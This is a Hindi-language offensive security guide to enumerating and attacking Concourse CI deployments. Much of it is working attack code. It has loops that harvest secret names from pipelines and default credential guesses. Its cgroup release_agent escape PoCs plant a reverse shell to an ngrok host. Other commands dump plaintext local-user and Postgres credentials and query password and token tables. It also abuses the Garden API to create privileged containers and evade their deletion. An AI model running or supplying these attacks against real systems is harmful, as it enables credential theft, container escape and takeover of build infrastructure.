Concourse सूचना संग्रहण और हमले

उपयोगकर्ता भूमिकाएँ और अनुमतियाँ

Concourse में पाँच भूमिकाएँ होती हैं:

• Concourse Admin: यह भूमिका केवल मुख्य टीम के मालिकों को दी जाती है (डिफ़ॉल्ट प्रारंभिक concourse टीम). Admins अन्य टीमों को कॉन्फ़िगर कर सकते हैं (उदाहरण: fly set-team, fly destroy-team...). इस भूमिका की अनुमतियाँ RBAC द्वारा प्रभावित नहीं की जा सकती हैं.

• owner: टीम के मालिक टीम के भीतर सब कुछ संशोधित कर सकते हैं.

• member: टीम के सदस्य टीम की संपत्तियों के भीतर पढ़ और लिख सकते हैं लेकिन टीम की सेटिंग्स में परिवर्तन नहीं कर सकते.

• pipeline-operator: पाइपलाइन ऑपरेटर पाइपलाइन ऑपरेशन्स जैसे कि बिल्ड्स ट्रिगर करना और संसाधनों को पिन करना कर सकते हैं, हालांकि वे पाइपलाइन कॉन्फ़िगरेशन्स को अपडेट नहीं कर सकते.

• viewer: टीम के दर्शकों के पास टीम और उसकी पाइपलाइनों के लिए "केवल-पढ़ने की" पहुँच होती है.

ध्यान दें कि Concourse पाइपलाइनों को टीमों के भीतर समूहित करता है. इसलिए एक टीम के सदस्य उन पाइपलाइनों को प्रबंधित कर सकते हैं और कई टीमें मौजूद हो सकती हैं. एक उपयोगकर्ता कई टीमों का सदस्य हो सकता है और उनमें से प्रत्येक में विभिन्न अनुमतियाँ रख सकता है.

Vars & Credential Manager

YAML कॉन्फ़िग्स में आप ((_source-name_:_secret-path_._secret-field_)) सिंटैक्स का उपयोग करके मानों को कॉन्फ़िगर कर सकते हैं। source-name वैकल्पिक है, और यदि छोड़ दिया जाता है, तो cluster-wide credential manager का उपयोग किया जाएगा, या मान statically प्रदान किया जा सकता है। secret-field वैकल्पिक है और यह एक फील्ड को निर्दिष्ट करता है जिसे प्राप्त सीक्रेट से पढ़ा जाएगा। यदि छोड़ दिया जाता है, तो क्रेडेंशियल मैनेजर एक 'डिफ़ॉल्ट फील्ड' को प्राप्त क्रेडेंशियल से पढ़ सकता है यदि फील्ड मौजूद है। इसके अलावा, secret-path और secret-field को डबल कोट्स "..." से घेरा जा सकता है यदि वे विशेष अक्षर जैसे कि . और : को समाहित करते हैं। उदाहरण के लिए, ((source:"my.secret"."field:1")) secret-path को my.secret और secret-field को field:1 सेट करेगा।

Static Vars

Static vars को tasks steps में निर्दिष्ट किया जा सकता है:

- task: unit-1.13
file: booklit/ci/unit.yml
vars: {tag: 1.13}

निम्नलिखित fly तर्क का उपयोग करते हुए:

• -v या --var NAME=VALUE वर NAME के लिए स्ट्रिंग VALUE को मान के रूप में सेट करता है।

• -y या --yaml-var NAME=VALUE VALUE को YAML के रूप में पार्स करता है और इसे वर NAME के मान के रूप में सेट करता है।

• -i या --instance-var NAME=VALUE VALUE को YAML के रूप में पार्स करता है और इसे इंस्टेंस वर NAME के मान के रूप में सेट करता है। Grouping Pipelines में इंस्टेंस वर्स के बारे में और जानें।

• -l या --load-vars-from FILE FILE को लोड करता है, जो एक YAML दस्तावेज़ है जिसमें वर नामों को मानों के साथ मैपिंग होती है, और उन सभी को सेट करता है।

Credential Management

पाइपलाइन में एक Credential Manager को निर्दिष्ट करने के विभिन्न तरीके हैं, https://concourse-ci.org/creds.html में पढ़ें। इसके अलावा, Concourse विभिन्न प्रकार के क्रेडेंशियल मैनेजर्स का समर्थन करता है:

• The Vault credential manager

• The CredHub credential manager

• The AWS SSM credential manager

• The AWS Secrets Manager credential manager

• Kubernetes Credential Manager

• The Conjur credential manager

• Caching credentials

• Redacting credentials

• Retrying failed fetches

Concourse Enumeration

Concourse पर्यावरण का अनुक्रमण करने के लिए आपको पहले मान्य क्रेडेंशियल एकत्रित करने की आवश्यकता होती है या एक प्रमाणित टोकन खोजने की, जो शायद एक .flyrc कॉन्फ़िग फ़ाइल में हो।

Login and Current User enum

• लॉगिन करने के लिए आपको एंडपॉइंट, टीम का नाम (डिफ़ॉल्ट है main) और एक टीम जिसके उपयोगकर्ता सदस्य हैं की जानकारी होनी चाहिए:

• fly --target example login --team-name my-team --concourse-url https://ci.example.com [--insecure] [--client-cert=./path --client-key=./path]

• कॉन्फ़िगर किए गए टारगेट्स प्राप्त करें:

• fly targets

• यह जांचें कि कॉन्फ़िगर किया गया टारगेट कनेक्शन अभी भी मान्य है:

• fly -t <target> status

• इंगित किए गए टारगेट के खिलाफ उपयोगकर्ता की भूमिका प्राप्त करें:

• fly -t <target> userinfo

Teams & Users

• टीमों की सूची प्राप्त करें

• fly -t <target> teams

• टीम के अंदर भूमिकाएँ प्राप्त करें

• fly -t <target> get-team -n <team-name>

• उपयोगकर्ताओं की सूची प्राप्त करें

• fly -t <target> active-users

Pipelines

• पाइपलाइनों की सूची:

• fly -t <target> pipelines -a

• पाइपलाइन yaml प्राप्त करें (संवेदनशील जानकारी परिभाषा में पाई जा सकती है):

• fly -t <target> get-pipeline -p <pipeline-name>

• सभी पाइपलाइन कॉन्फ़िग घोषित वर्स प्राप्त करें

• for pipename in $(fly -t <target> pipelines | grep -Ev "^id" | awk '{print $2}'); do echo $pipename; fly -t <target> get-pipeline -p $pipename -j | grep -Eo '"vars":[^}]+'; done

• सभी पाइपलाइनों के गुप्त नामों का उपयोग किया जाता है (यदि आप एक जॉब बना सकते हैं/संशोधित कर सकते हैं या एक कंटेनर को हाइजैक कर सकते हैं तो आप उन्हें निकाल सकते हैं):

rm /tmp/secrets.txt;
for pipename in $(fly -t onelogin pipelines | grep -Ev "^id" | awk '{print $2}'); do
echo $pipename;
fly -t onelogin get-pipeline -p $pipename | grep -Eo '\(\(.*\)\)' | sort | uniq | tee -a /tmp/secrets.txt;
echo "";
done
echo ""
echo "ALL SECRETS"
cat /tmp/secrets.txt | sort | uniq
rm /tmp/secrets.txt

कंटेनर्स और वर्कर्स

• वर्कर्स की सूची:

• fly -t <target> workers

• कंटेनर्स की सूची:

• fly -t <target> containers

• बिल्ड्स की सूची (यह देखने के लिए कि क्या चल रहा है):

• fly -t <target> builds

Concourse हमले

क्रेडेंशियल्स ब्रूट-फोर्स

• admin:admin

• test:test

सीक्रेट्स और पैराम्स एन्युमेरेशन

पिछले अनुभाग में हमने देखा कि कैसे आप सभी सीक्रेट्स नाम और वर्स को प्राप्त कर सकते हैं जो पाइपलाइन द्वारा इस्तेमाल किए जाते हैं। वर्स में संवेदनशील जानकारी हो सकती है और सीक्रेट्स के नाम बाद में उन्हें चुराने की कोशिश करने के लिए उपयोगी होंगे।

चल रहे या हाल ही में चले गए कंटेनर के अंदर सेशन

यदि आपके पास पर्याप्त अधिकार हैं (मेंबर रोल या अधिक) तो आप पाइपलाइन्स और रोल्स की सूची बना सकते हैं और बस <pipeline>/<job> कंटेनर के अंदर एक सेशन प्राप्त कर सकते हैं इसका उपयोग करके:

fly -t tutorial intercept --job pipeline-name/job-name
fly -t tutorial intercept # To be presented a prompt with all the options

इन अनुमतियों के साथ आप संभवतः निम्नलिखित कर सकते हैं:

• कंटेनर के अंदर के secrets चुराना

• नोड की ओर भागने का प्रयास करना

• cloud metadata endpoint का संग्रहण/दुरुपयोग करना (पॉड से और यदि संभव हो तो नोड से)

Pipeline Creation/Modification

यदि आपके पास पर्याप्त विशेषाधिकार हैं (member role या अधिक) तो आप नए pipelines बनाने/संशोधित करने में सक्षम होंगे। इस उदाहरण को देखें:

jobs:
- name: simple
plan:
- task: simple-task
privileged: true
config:
# Tells Concourse which type of worker this task should run on
platform: linux
image_resource:
type: registry-image
source:
repository: busybox # images are pulled from docker hub by default
run:
path: sh
args:
- -cx
- |
echo "$SUPER_SECRET"
sleep 1000
params:
SUPER_SECRET: ((super.secret))

नई पाइपलाइन के संशोधन/निर्माण के साथ आप सक्षम होंगे:

• चुराना गुप्त सूचनाएं (उन्हें बाहर निकालने या कंटेनर के अंदर जाकर env चलाने के द्वारा)

• नोड पर भाग निकलना (आपको पर्याप्त अधिकार देकर - privileged: true)

• क्लाउड मेटाडेटा एंडपॉइंट का सूचीकरण/दुरुपयोग (पॉड और नोड से)

• बनाई गई पाइपलाइन को हटाना

कस्टम टास्क निष्पादित करें

यह पिछली विधि के समान है लेकिन पूरी नई पाइपलाइन को संशोधित/निर्मित करने के बजाय आप केवल एक कस्टम टास्क निष्पादित कर सकते हैं (जो शायद बहुत अधिक गुप्त होगा):

# For more task_config options check https://concourse-ci.org/tasks.html
platform: linux
image_resource:
type: registry-image
source:
repository: ubuntu
run:
path: sh
args:
- -cx
- |
env
sleep 1000
params:
SUPER_SECRET: ((super.secret))

fly -t tutorial execute --privileged --config task_config.yml

प्रिविलेज्ड टास्क से नोड में एस्केपिंग

पिछले खंडों में हमने देखा कि कैसे concourse के साथ प्रिविलेज्ड टास्क को निष्पादित किया जाए। यह कंटेनर को docker कंटेनर में प्रिविलेज्ड फ्लैग के समान एक्सेस नहीं देगा। उदाहरण के लिए, आप /dev में नोड फाइलसिस्टम डिवाइस नहीं देखेंगे, इसलिए एस्केप अधिक "जटिल" हो सकता है।

निम्नलिखित PoC में हम कुछ छोटे संशोधनों के साथ release_agent का उपयोग करके एस्केप करने जा रहे हैं:

# Mounts the RDMA cgroup controller and create a child cgroup
# If you're following along and get "mount: /tmp/cgrp: special device cgroup does not exist"
# It's because your setup doesn't have the memory cgroup controller, try change memory to rdma to fix it
mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

# Enables cgroup notifications on release of the "x" cgroup
echo 1 > /tmp/cgrp/x/notify_on_release


# CHANGE ME
# The host path will look like the following, but you need to change it:
host_path="/mnt/vda1/hostpath-provisioner/default/concourse-work-dir-concourse-release-worker-0/overlays/ae7df0ca-0b38-4c45-73e2-a9388dcb2028/rootfs"

## The initial path "/mnt/vda1" is probably the same, but you can check it using the mount command:
#/dev/vda1 on /scratch type ext4 (rw,relatime)
#/dev/vda1 on /tmp/build/e55deab7 type ext4 (rw,relatime)
#/dev/vda1 on /etc/hosts type ext4 (rw,relatime)
#/dev/vda1 on /etc/resolv.conf type ext4 (rw,relatime)

## Then next part I think is constant "hostpath-provisioner/default/"

## For the next part "concourse-work-dir-concourse-release-worker-0" you need to know how it's constructed
# "concourse-work-dir" is constant
# "concourse-release" is the consourse prefix of the current concourse env (you need to find it from the API)
# "worker-0" is the name of the worker the container is running in (will be usually that one or incrementing the number)

## The final part "overlays/bbedb419-c4b2-40c9-67db-41977298d4b3/rootfs" is kind of constant
# running `mount | grep "on / " | grep -Eo "workdir=([^,]+)"` you will see something like:
# workdir=/concourse-work-dir/overlays/work/ae7df0ca-0b38-4c45-73e2-a9388dcb2028
# the UID is the part we are looking for

# Then the host_path is:
#host_path="/mnt/<device>/hostpath-provisioner/default/concourse-work-dir-<concourse_prefix>-worker-<num>/overlays/<UID>/rootfs"

# Sets release_agent to /path/payload
echo "$host_path/cmd" > /tmp/cgrp/release_agent


#====================================
#Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
chmod a+x /cmd
#====================================
# Get output
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
#====================================

# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

# Reads the output
cat /output

Worker container से node में भागना

इसके लिए एक सामान्य release_agent escape के साथ एक मामूली संशोधन पर्याप्त है:

mkdir /tmp/cgrp && mount -t cgroup -o memory cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

# Enables cgroup notifications on release of the "x" cgroup
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab | head -n 1`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

#====================================
#Reverse shell
echo '#!/bin/bash' > /cmd
echo "bash -i >& /dev/tcp/0.tcp.ngrok.io/14966 0>&1" >> /cmd
chmod a+x /cmd
#====================================
# Get output
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd
#====================================

# Executes the attack by spawning a process that immediately ends inside the "x" child cgroup
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

# Reads the output
cat /output

वेब कंटेनर से नोड में भागना

यदि वेब कंटेनर में कुछ रक्षा निष्क्रिय है, तब भी यह सामान्य विशेषाधिकार प्राप्त कंटेनर के रूप में नहीं चल रहा है (उदाहरण के लिए, आप नहीं माउंट कर सकते और क्षमताएं बहुत सीमित हैं, इसलिए कंटेनर से भागने के सभी आसान तरीके बेकार हैं)।

हालांकि, यह स्थानीय क्रेडेंशियल्स को स्पष्ट पाठ में संग्रहीत करता है:

cat /concourse-auth/local-users
test:test

env | grep -i local_user
CONCOURSE_MAIN_TEAM_LOCAL_USER=test
CONCOURSE_ADD_LOCAL_USER=test:test

आप उन क्रेडेंशियल्स का उपयोग कर सकते हैं वेब सर्वर में लॉगिन करने के लिए और एक विशेषाधिकार प्राप्त कंटेनर बनाने और नोड में एस्केप करने के लिए।

पर्यावरण में आपको concourse द्वारा उपयोग किए जाने वाले postgresql इंस्टेंस तक पहुँचने के लिए जानकारी भी मिल सकती है (पता, उपयोगकर्ता नाम, पासवर्ड और डेटाबेस सहित अन्य जानकारी):

env | grep -i postg
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_ADDR=10.107.191.238
CONCOURSE_RELEASE_POSTGRESQL_PORT_5432_TCP_PORT=5432
CONCOURSE_RELEASE_POSTGRESQL_SERVICE_PORT_TCP_POSTGRESQL=5432
CONCOURSE_POSTGRES_USER=concourse
CONCOURSE_POSTGRES_DATABASE=concourse
CONCOURSE_POSTGRES_PASSWORD=concourse
[...]

# Access the postgresql db
psql -h 10.107.191.238 -U concourse -d concourse
select * from password; #Find hashed passwords
select * from access_tokens;
select * from auth_code;
select * from client;
select * from refresh_token;
select * from teams; #Change the permissions of the users in the teams
select * from users;

गार्डन सर्विस का दुरुपयोग - वास्तविक हमला नहीं

डिफ़ॉल्ट रूप से प्रत्येक कॉनकोर्स वर्कर पोर्ट 7777 पर एक गार्डन सर्विस चला रहा होगा। यह सर्विस वेब मास्टर द्वारा वर्कर को क्या क्रियान्वित करना है (इमेज डाउनलोड करना और प्रत्येक टास्क चलाना) यह इंगित करने के लिए उपयोग की जाती है। यह हमलावर के लिए काफी अच्छा लगता है, लेकिन कुछ अच्छी सुरक्षा हैं:

• यह केवल स्थानीय रूप से प्रकट होता है (127.0.0.1) और मुझे लगता है जब वर्कर वेब के साथ विशेष SSH सर्विस के माध्यम से प्रमाणित होता है, एक टनल बनाई जाती है ताकि वेब सर्वर प्रत्येक वर्कर के अंदर प्रत्येक गार्डन सर्विस से बात कर सके।

• वेब सर्वर हर कुछ सेकंड में चल रहे कंटेनरों की निगरानी कर रहा है, और अप्रत्याशित कंटेनरों को हटा दिया जाता है। इसलिए अगर आप कस्टम कंटेनर चलाना चाहते हैं तो आपको वेब सर्वर और गार्डन सर्विस के बीच संचार में छेड़छाड़ करनी होगी।

कॉनकोर्स वर्कर्स उच्च कंटेनर विशेषाधिकारों के साथ चलते हैं:

Container Runtime: docker
Has Namespaces:
pid: true
user: false
AppArmor Profile: kernel
Capabilities:
BOUNDING -> chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read
Seccomp: disabled

हालांकि, माउंटिंग /dev डिवाइस ऑफ द नोड या release_agent काम नहीं करेगा (क्योंकि असली डिवाइस जिसमें नोड की फाइल सिस्टम है, वह सुलभ नहीं है, केवल एक वर्चुअल डिवाइस है)। हम नोड की प्रक्रियाओं तक पहुँच नहीं सकते, इसलिए बिना कर्नेल एक्सप्लॉइट्स के नोड से बाहर निकलना जटिल हो जाता है।

ध्यान दें कि concourse के साथ खेलते समय मैंने देखा कि जब एक नया कंटेनर कुछ चलाने के लिए उत्पन्न होता है, तो कंटेनर की प्रक्रियाएं वर्कर कंटेनर से सुलभ होती हैं, इसलिए यह एक कंटेनर की तरह है जो उसके अंदर एक नया कंटेनर बना रहा है।

एक चल रहे विशेषाधिकार प्राप्त कंटेनर के अंदर प्रवेश करना

# Get current container
curl 127.0.0.1:7777/containers
{"Handles":["ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]}

# Get container info
curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/info
curl 127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/properties

# Execute a new process inside a container
## In this case "sleep 20000" will be executed in the container with handler ac793559-7f53-4efc-6591-0171a0391e53
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'

# OR instead of doing all of that, you could just get into the ns of the process of the privileged container
nsenter --target 76011 --mount --uts --ipc --net --pid -- sh

एक नया विशेषाधिकार प्राप्त कंटेनर बनाना

आप बहुत आसानी से एक नया कंटेनर बना सकते हैं (बस एक यादृच्छिक UID चलाएं) और उस पर कुछ निष्पादित करें:

curl -X POST http://127.0.0.1:7777/containers \
-H 'Content-Type: application/json' \
-d '{"handle":"123ae8fc-47ed-4eab-6b2e-123458880690","rootfs":"raw:///concourse-work-dir/volumes/live/ec172ffd-31b8-419c-4ab6-89504de17196/volume","image":{},"bind_mounts":[{"src_path":"/concourse-work-dir/volumes/live/9f367605-c9f0-405b-7756-9c113eba11f1/volume","dst_path":"/scratch","mode":1}],"properties":{"user":""},"env":["BUILD_ID=28","BUILD_NAME=24","BUILD_TEAM_ID=1","BUILD_TEAM_NAME=main","ATC_EXTERNAL_URL=http://127.0.0.1:8080"],"limits":{"bandwidth_limits":{},"cpu_limits":{},"disk_limits":{},"memory_limits":{},"pid_limits":{}}}'

# Wget will be stucked there as long as the process is being executed
wget -v -O- --post-data='{"id":"task2","path":"sh","args":["-cx","sleep 20000"],"dir":"/tmp/build/e55deab7","rlimits":{},"tty":{"window_size":{"columns":500,"rows":500}},"image":{}}' \
--header='Content-Type:application/json' \
'http://127.0.0.1:7777/containers/ac793559-7f53-4efc-6591-0171a0391e53/processes'

हालांकि, वेब सर्वर हर कुछ सेकंड में चल रहे कंटेनरों की जांच कर रहा है, और यदि कोई अप्रत्याशित कंटेनर पाया जाता है, तो उसे हटा दिया जाएगा। चूंकि संचार HTTP में हो रहा है, आप संचार में हेरफेर करके अप्रत्याशित कंटेनरों के विलोपन से बच सकते हैं:

GET /containers HTTP/1.1.
Host: 127.0.0.1:7777.
User-Agent: Go-http-client/1.1.
Accept-Encoding: gzip.
.

T 127.0.0.1:7777 -> 127.0.0.1:59722 [AP] #157
HTTP/1.1 200 OK.
Content-Type: application/json.
Date: Thu, 17 Mar 2022 22:42:55 GMT.
Content-Length: 131.
.
{"Handles":["123ae8fc-47ed-4eab-6b2e-123458880690","ac793559-7f53-4efc-6591-0171a0391e53","c6cae8fc-47ed-4eab-6b2e-f3bbe8880690"]}

T 127.0.0.1:59722 -> 127.0.0.1:7777 [AP] #159
DELETE /containers/123ae8fc-47ed-4eab-6b2e-123458880690 HTTP/1.1.
Host: 127.0.0.1:7777.
User-Agent: Go-http-client/1.1.
Accept-Encoding: gzip.

संदर्भ

• https://concourse-ci.org/vars.html